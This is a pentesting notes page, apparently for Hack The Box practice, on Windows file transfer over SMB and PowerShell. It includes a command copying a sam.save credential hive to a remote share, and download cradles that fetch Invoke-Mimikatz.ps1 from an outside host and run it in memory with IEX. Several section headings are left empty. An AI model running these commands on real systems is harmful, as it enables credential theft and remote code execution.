Windows File Transfer

Smb Server / Mount share

smbserver.py -smb2support -username gust -password guest share /root/htb

#Mount 
net use x: \\<IP>\share /user:guest <password>
#Download
cmd /c "copy file.txt X:\"
move sam.save \\10.10.15.16\CompData

$pass = convertto-securestring 'staphy' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('staphy',$pass)
New-PSDrive -Name "staphy" -PSProvider "FileSystem" -Credential $creds -Root "\\<IP>\Public"
cd staphy:

PowerShell

PowerShell Downloads

#System.Net.WebClient class can be used to download a file over HTTP.
(New-Object System.Net.WebClient).DownloadFile('http://<IP>:PORT/file.EXT',"C:\Outfile.EXT")

#From PowerShell 3.0 Invoke-WebRequest but slower,
#Alias iwr, curl, wget can be used instead of Invoke-WebRequest
Invoke-WebRequest -uri http://<IP>:PORT/file.Ext -OutFile file.Ext

#Execute Payload directly into memory using Invoke-Expression
#Alias iex
IEX (New-Object Net-WebClient).DownloadString('http://<IP>:PORT/Invoke-Mimikatz.ps1')

#IEX also accepts pipeline input
Invoke-WebRequest https://<IP>:PORT/Invoke-Mimikatz.ps1 | iex

There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.

This can be bypassed using the parameter -UseBasicParsing

Powershell download cradles that do not observe Internet Explorer’s first-run check can also be used. Harmj0y has compiled an extensive list of PowerShell download cradles here. It is worth gaining familiarity with them and their individual nuances, such as not observing a proxy or touching a disk to select the appropriate one for the situation.

PowerShell Uploads

Bitadmin

Download

Upload

Certutil

PreviousFile TransferNextLinux File Transfer

Last updated